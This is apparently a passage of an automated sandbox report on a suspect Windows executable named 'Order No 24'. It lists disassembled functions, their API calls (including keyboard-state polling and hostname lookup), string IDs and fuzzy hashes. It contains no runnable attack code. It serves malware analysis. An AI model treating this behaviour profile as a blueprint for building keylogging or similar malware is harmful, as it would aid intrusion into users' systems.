                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • timeGetTime.WINMM ref: 009C7794
                                                                                                                                    • Part of subcall function 0099DC38: timeGetTime.WINMM(?,7694B400,009F58AB), ref: 0099DC3C
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 009C77C0
                                                                                                                                  • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009C77E4
                                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 009C7806
                                                                                                                                  • SetActiveWindow.USER32 ref: 009C7825
                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009C7833
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 009C7852
                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 009C785D
                                                                                                                                  • IsWindow.USER32 ref: 009C7869
                                                                                                                                  • EndDialog.USER32(00000000), ref: 009C787A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                  • String ID: BUTTON
                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                  • Opcode ID: 47c245c66966cbe41b558bbf0c03b12953ba49dc722ccadf0938fe157a3d2336
                                                                                                                                  • Instruction ID: 53e20495ac89392b187b44308b2a34250375c1e84c42b4531877c2b7be117459
                                                                                                                                  • Opcode Fuzzy Hash: 47c245c66966cbe41b558bbf0c03b12953ba49dc722ccadf0938fe157a3d2336
                                                                                                                                  • Instruction Fuzzy Hash: BD213EBA604209AFEB019FE0ECC9F2A7F79FB85348F000018F50596162DB626D13DE22
                                                                                                                                  Function 009D02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 009D034B
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009D03DE
                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 009D03F2
                                                                                                                                  • CoCreateInstance.OLE32(00A0DA8C,00000000,00000001,00A33CF8,?), ref: 009D043E
                                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009D04AD
                                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 009D0505
                                                                                                                                  • _memset.LIBCMT ref: 009D0542
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 009D057E
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009D05A1
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 009D05A8
                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009D05DF
                                                                                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 009D05E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1246142700-0
                                                                                                                                  • Opcode ID: 5a74b70c8eb54b6b9a1ffdf691b0501220801b4a09a33cbb8e8f4faa9b0c7fdd
                                                                                                                                  • Instruction ID: a2a08c99493c9f980865583f0bddf9f1420b371a85e02abd0dd9ea7e5cddd7dd
                                                                                                                                  • Opcode Fuzzy Hash: 5a74b70c8eb54b6b9a1ffdf691b0501220801b4a09a33cbb8e8f4faa9b0c7fdd
                                                                                                                                  • Instruction Fuzzy Hash: FDB1B775A00209AFDB04DFA4D889EAEBBB9AF88304F148459F919EB351DB30ED45CB50
                                                                                                                                  Function 009C2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009C2ED6
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 009C2F41
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 009C2F61
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 009C2F78
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 009C2FA7
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 009C2FB8
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 009C2FE4
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 009C2FF2
                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 009C301B
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 009C3029
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 009C3052
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 009C3060
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  • Opcode ID: 8d6ebf7654ff4059dc1189d1768950b77223ca289e41b8149608731b1698a0ef
                                                                                                                                  • Instruction ID: adeedbbdc90c85658af4f753157ff580513416a319f17dfe05db6b23b4be720f
                                                                                                                                  • Opcode Fuzzy Hash: 8d6ebf7654ff4059dc1189d1768950b77223ca289e41b8149608731b1698a0ef
                                                                                                                                  • Instruction Fuzzy Hash: BD51A565E0879829FB35DBA48811FEABBB85F11340F08C59DD5C25B1C2DA949B8CC7A3
                                                                                                                                  Function 009BED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 009BED1E
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009BED30
                                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009BED8E
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 009BED99
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009BEDAB
                                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009BEE01
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 009BEE0F
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009BEE20
                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009BEE63
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 009BEE71
                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009BEE8E
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 009BEE9B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                  • Opcode ID: c93006b8b04127241b4566acccfe62eaf436495ae73aa7cf9ec0bdd6b6295a9b
                                                                                                                                  • Instruction ID: 0aaa43c25fdec5c40c032c82208d8e9395215d5e749e761fc5e47b1a29f84123
                                                                                                                                  • Opcode Fuzzy Hash: c93006b8b04127241b4566acccfe62eaf436495ae73aa7cf9ec0bdd6b6295a9b
                                                                                                                                  • Instruction Fuzzy Hash: 68511171B10209AFDB18CFA9DD99AAEBBBAFB88710F14812DF519D7290D771DD018B10
                                                                                                                                  Function 0099B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0099B759,?,00000000,?,?,?,?,0099B72B,00000000,?), ref: 0099BA58
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0099B72B), ref: 0099B7F6
                                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 0099B88D
                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 009FD8A6
                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD8D7
                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD8EE
                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD90A
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009FD91C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 641708696-0
                                                                                                                                  • Opcode ID: ffde16b8d951e87e7f21bc6320f2747c5ec6b6498de57bf8aa589af8a56b45d0
                                                                                                                                  • Instruction ID: c84c90877f47d5d7f55201850cb3804c9a6dbe62dacdbd37ed98d3d7c60f09b0
                                                                                                                                  • Opcode Fuzzy Hash: ffde16b8d951e87e7f21bc6320f2747c5ec6b6498de57bf8aa589af8a56b45d0
                                                                                                                                  • Instruction Fuzzy Hash: 0E61DC39502604DFDF25DF99EA88B35B7FAFF85312F150519E14686A70C779A8C2CB40
                                                                                                                                  Function 0099B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0099B438
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                  • Opcode ID: c855533861af610b58446e0608e433e376b7732e3d5320c555bc951d7536b4d6
                                                                                                                                  • Instruction ID: 37d6f6a8775c1e8067b976ae15d5a2937b959b7bad3aa5f75e90089e34986812
                                                                                                                                  • Opcode Fuzzy Hash: c855533861af610b58446e0608e433e376b7732e3d5320c555bc951d7536b4d6
                                                                                                                                  • Instruction Fuzzy Hash: 2D41A3351011089BEF209FACED89BB93B6AAB46731F144365FE658A1F6D7348C42E721
                                                                                                                                  Function 009C690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 136442275-0
                                                                                                                                  • Opcode ID: a0b6364969e7db60eaa579af2f8bc3b3ade750042c6e544a49bef1c3682ad833
                                                                                                                                  • Instruction ID: c462155a841601a6723d971ece8441b98e550fd7948a056a733a8733e2be8fba
                                                                                                                                  • Opcode Fuzzy Hash: a0b6364969e7db60eaa579af2f8bc3b3ade750042c6e544a49bef1c3682ad833
                                                                                                                                  • Instruction Fuzzy Hash: 2341117784521CAECF61DB94CC45EDF73BCEB85310F0041A6B659A2051EB30ABE58F91
                                                                                                                                  Function 009CD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(00A1DC00,00A1DC00,00A1DC00), ref: 009CD7CE
                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00A33A70,00000061), ref: 009CD898
                                                                                                                                  • _wcscpy.LIBCMT ref: 009CD8C2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                  • API String ID: 2820617543-1000479233
                                                                                                                                  • Opcode ID: 32ddf1728cd2e810751ae04ca0a82f09f4545aaf38ef5b225bacecdd4c01fab9
                                                                                                                                  • Instruction ID: 9a270c8c1b6d36d5288143b834ef689e52ff9d7c9a430613ed1828b825688ead
                                                                                                                                  • Opcode Fuzzy Hash: 32ddf1728cd2e810751ae04ca0a82f09f4545aaf38ef5b225bacecdd4c01fab9
                                                                                                                                  • Instruction Fuzzy Hash: 3A516E75909300AFCB00EF14D892FAAB7A5FFC4354F10892DF59A572A2EB31DA05CB42
                                                                                                                                  Function 0098936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __swprintf.LIBCMT ref: 009893AB
                                                                                                                                  • __itow.LIBCMT ref: 009893DF
                                                                                                                                    • Part of subcall function 009A1557: _xtow@16.LIBCMT ref: 009A1578
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                                  • API String ID: 1502193981-2263619337
                                                                                                                                  • Opcode ID: 40c566a50faf67bf59a9394635578d434b58c0bb527b33f4f6a609b006c3096b
                                                                                                                                  • Instruction ID: 0f2ce39df7d601cdba6ea408387640eebe7a7f3db81c471a444fa27aa0b7efe4
                                                                                                                                  • Opcode Fuzzy Hash: 40c566a50faf67bf59a9394635578d434b58c0bb527b33f4f6a609b006c3096b
                                                                                                                                  • Instruction Fuzzy Hash: 8D41DA71504208ABDB24EB74D941FBA77E8EF85310F24486FF18AD72D1EA35D941CB50
                                                                                                                                  Function 009EA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009EA259
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 009EA260
                                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009EA273
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009EA27B
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 009EA286
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 009EA28F
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 009EA299
                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009EA2AD
                                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009EA2B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                                  • Opcode ID: 28c9b9b91ed50f02f5053d8cf6db29c6001044958d4f64dead053b8ce261bd9b
                                                                                                                                  • Instruction ID: cec5ed216dde8edf8a7fd18429379bb42b2db8acfcc964bb9baf45337fcc51ed
                                                                                                                                  • Opcode Fuzzy Hash: 28c9b9b91ed50f02f5053d8cf6db29c6001044958d4f64dead053b8ce261bd9b
                                                                                                                                  • Instruction Fuzzy Hash: 8D316F32100159ABDF129FE5DC49FEA3B6DFF19360F110214FA29A61A0CB36EC12DB65
                                                                                                                                  Function 009C6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                  • API String ID: 2620052-3771769585
                                                                                                                                  • Opcode ID: fd73908af1320df2d01ccd165f0789773b9fbfc4c5d554de6838d8d774ba6014
                                                                                                                                  • Instruction ID: e2c57eca994ec47e9d994e15a8472e084a119cd4699b32b63a2585460ef10b88
                                                                                                                                  • Opcode Fuzzy Hash: fd73908af1320df2d01ccd165f0789773b9fbfc4c5d554de6838d8d774ba6014
                                                                                                                                  • Instruction Fuzzy Hash: 26110A72904219BBDB25ABB4AC09FDA77BCEF85710F00006DF04596081EF70DE868B92
                                                                                                                                  Function 009A500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009A5047
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 009A50E0
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 009A5116
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 009A5133
                                                                                                                                  • __allrem.LIBCMT ref: 009A5189
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A51A5
                                                                                                                                  • __allrem.LIBCMT ref: 009A51BC
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A51DA
                                                                                                                                  • __allrem.LIBCMT ref: 009A51F1
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A520F
                                                                                                                                  • __invoke_watson.LIBCMT ref: 009A5280
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 384356119-0
                                                                                                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                  • Instruction ID: 60364858a8a8b071236c6e572301140b0c0621166099c9658600ba6c88d0d565
                                                                                                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                  • Instruction Fuzzy Hash: 0C71E672B00F16ABE7149F78CC91BAAB3A8AF52774F164229F914D7681E770DD408BD0
                                                                                                                                  Function 009C4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C4DF8
                                                                                                                                  • GetMenuItemInfoW.USER32(00A41708,000000FF,00000000,00000030), ref: 009C4E59
                                                                                                                                  • SetMenuItemInfoW.USER32(00A41708,00000004,00000000,00000030), ref: 009C4E8F
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 009C4EA1
